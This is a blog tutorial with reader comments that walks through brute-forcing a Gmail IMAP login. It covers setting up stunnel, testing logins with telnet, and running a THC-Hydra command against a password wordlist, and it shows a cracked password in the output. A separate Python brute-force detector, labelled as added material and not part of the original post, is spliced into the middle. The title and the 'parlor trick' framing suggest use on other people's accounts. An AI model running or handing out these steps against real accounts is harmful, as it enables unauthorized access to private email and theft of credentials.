I read your email! Access your GMail IMAP Account.

Users are still known to use simple passwords. If you need to help convince someone of the importance of strong passwords, you can use a brute force tool to demonstrate what a good password list can do.

The first brute-force tool I ever picked up was THC-Hydra which supports all kinds of protocols like HTTP, HTTPS, VNC and IMAP to name a few. GMail is very popular in my circle of friends. Brute forcing a GMail account tends to be a very impressive parlor trick. The only issue is that GMail actually uses SSL IMAP and Hydra only supports clear-text IMAP. The solution: stunnel. Stunnel will encrypt your TCP connection inside SSL. Stunnel takes care of the encryption and Hydra takes care of the IMAP login attempts.

Read on to see a step-by-step how-to on setting this up on Ubuntu Lucid Lynx 10.04.

First, you need to compile THC-Hydra. Follow the instructions here.

Installing STUNNEL is a bit simpler.

sudo apt-get install stunnel

Edit /etc/default/stunnel4, change ENABLED=0 to ENABLED=1.

Edit /etc/stunnel/stunnel.conf and set it up for client mode. The configuration for IMAP will accept connections on the standard IMAP TCP port "143" and redirect the traffic to imap.gmail.com on the standard SSL IMAP port "993".

Below is the stunnel.conf file I use.

; Sample stunnel configuration file by Michal Trojnara 2002-2009
; Some options used here may not be adequate for your particular configuration
; Please make sure you understand them (especially the effect of the chroot jail)
 
; Certificate/key is needed in server mode and optional in client mode
;cert = /etc/ssl/certs/stunnel.pem
;key = /etc/ssl/certs/stunnel.pem
 
; Protocol version (all, SSLv2, SSLv3, TLSv1)
sslVersion = SSLv3
 
; Some security enhancements for UNIX systems - comment them out on Win32
chroot = /var/lib/stunnel4/
setuid = stunnel4
setgid = stunnel4
; PID is created inside the chroot jail
pid = /stunnel4.pid
 
; Some performance tunings
socket = l:TCP_NODELAY=1
socket = r:TCP_NODELAY=1
;compression = zlib
 
; Workaround for Eudora bug
;options = DONT_INSERT_EMPTY_FRAGMENTS
 
; Authentication stuff
;verify = 2
; Don't forget to c_rehash CApath
; CApath is located inside chroot jail
;CApath = /certs
; It's often easier to use CAfile
;CAfile = /etc/stunnel/certs.pem
; Don't forget to c_rehash CRLpath
; CRLpath is located inside chroot jail
;CRLpath = /crls
; Alternatively you can use CRLfile
;CRLfile = /etc/stunnel/crls.pem
 
; Some debugging stuff useful for troubleshooting
debug = 7
output = /var/log/stunnel4/stunnel.log
 
; Use it for client mode
client = yes
 
; Service-level configuration
 
;[pop3s]
;accept  = 995
;connect = 110
 
[imaps]
accept = 143
connect = imap.gmail.com:993
 
;[ssmtp]
;accept  = 465
;connect = 25
 
;[https]
;accept  = 443
;connect = 80
;TIMEOUTclose = 0
 
; vim:ft=dosini

Start up the stunnel daemon.

sudo /etc/init.d/stunnel4 start

You can verify that the IMAP port is listening on your local server.

netstat -an | grep -iw LISTEN

Look for the following line in the output:

tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN

Now, before you can brute-force your GMail account, you must enable IMAP. Log on to your GMail account and click on Settings > Forwarding and POP/IMAP. Locate the IMAP Access: section and select Enable IMAP. Click on the Save Changes button to complete this step.

Let's pull out our 1970s toolbox and use TELNET to test our STUNNEL configuration and our GMail access. We will telnet to localhost's port 143. We should see the Gmail banner "* OK Gimap ready for requests from …"

telnet localhost 143
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
* OK Gimap ready for requests from 5.5.5.5 c5if2789008nfi.67

Now that we are connected to the GMail IMAP server, we can test communication by using some IMAP commands like LOGIN. In the example below, change username@gmail.com to your GMail username, and change password to your actual password.

01 LOGIN username@gmail.com password
01 OK username@gmail.com authenticated (Success)

You are now successfully logged into your GMail account. Use the LOGOUT command to end the session.

02 LOGOUT
* BYE LOGOUT Requested
02 OK 73 good day (Success)
Connection closed by foreign host.

OK, now we know we have our setup ready to go. This is where we start using Hydra to brute-force its way into the GMail account.

To start you will need a text file with common passwords. This is known as a wordlist. You can google for lists or pick some up from here. For my demonstration, I have a small list that I normally use which you can grab here. For testing you can add your real password to the list.

Now you are ready to use Hydra. You can use the GUI version by running xhydra but I prefer the command line.

hydra -l username@gmail.com -P wordlist.txt -V localhost imap

The -V option shows the login and password combination for each attempt. Once Hydra finds a match, it has to stop all the other attempts that are still running. At the end of the output you should see something like this:

[143][imap] host: 127.0.0.1   login: username@gmail.com   password: 12345678
[STATUS] attack finished for localhost (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2010-08-24 14:12:59
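Seen from the mail server's side, a run like the one above is a burst of failed logins for one account from one source, followed by a success. The following is an added example, not part of the original post, showing how that pattern can be flagged in authentication logs; the log line format, the threshold and the sample addresses are all constructed for the example.

```python
# Added example: flag IMAP password-guessing bursts in authentication logs.
# The log line format is constructed here; adapt LINE_RE to your server's.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) imap-login (?P<result>OK|FAIL) "
    r"user=(?P<user>\S+) rip=(?P<ip>\S+)$"
)

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Alert on (ip, user) pairs with >= threshold failures inside window.
    A later success from the same source marks the alert 'compromised'."""
    recent = defaultdict(deque)   # (ip, user) -> timestamps of recent failures
    alerts = {}                   # (ip, user) -> alert dict
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue              # ignore lines we cannot parse
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        key = (m["ip"], m["user"])
        if m["result"] == "FAIL":
            q = recent[key]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()       # drop failures older than the window
            if len(q) >= threshold and key not in alerts:
                alerts[key] = {"ip": key[0], "user": key[1],
                               "first_seen": q[0], "status": "guessing"}
        elif key in alerts:       # success after a burst: password was found
            alerts[key]["status"] = "compromised"
    return list(alerts.values())

# Constructed sample: six failures in six seconds followed by a success,
# plus one user who mistyped a password once and then logged in.
SAMPLE_LOG = [
    f"2010-08-24T14:12:{s:02d}Z imap-login FAIL user=alice@example.com rip=203.0.113.7"
    for s in range(1, 7)
] + [
    "2010-08-24T14:12:07Z imap-login OK user=alice@example.com rip=203.0.113.7",
    "2010-08-24T14:12:30Z imap-login FAIL user=bob@example.com rip=198.51.100.4",
    "2010-08-24T14:12:41Z imap-login OK user=bob@example.com rip=198.51.100.4",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

An alert with status "compromised" is the one to act on first: the account's password should be reset and its sessions revoked, while "guessing" alerts are candidates for rate limiting or lockout.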

Congratulations, you now have access to YOUR email. You can reward yourself by purchasing a t-shirt that publicizes your brand new conquest here.


4 Responses to “I read your email! Access your GMail IMAP Account.”

  1. Vaibhav says:

    Hello,
    Sir, I am unable to edit /etc/default/stunnel4 and change ENABLED=0 to ENABLED=1, as the file is read-only. How do I get around this problem? I would suggest you also mention this in your tutorial. Thanks ….

  2. yoori says:

    It works great. Thanks for tutorial.

  3. Steve says:

    Having trouble locating the /etc/default/stunnel4 [Enabled=0 to Enabled=1]
    as well as the conf. file.
    I am using Unix on Mac OS [Tiger], any way you could help?
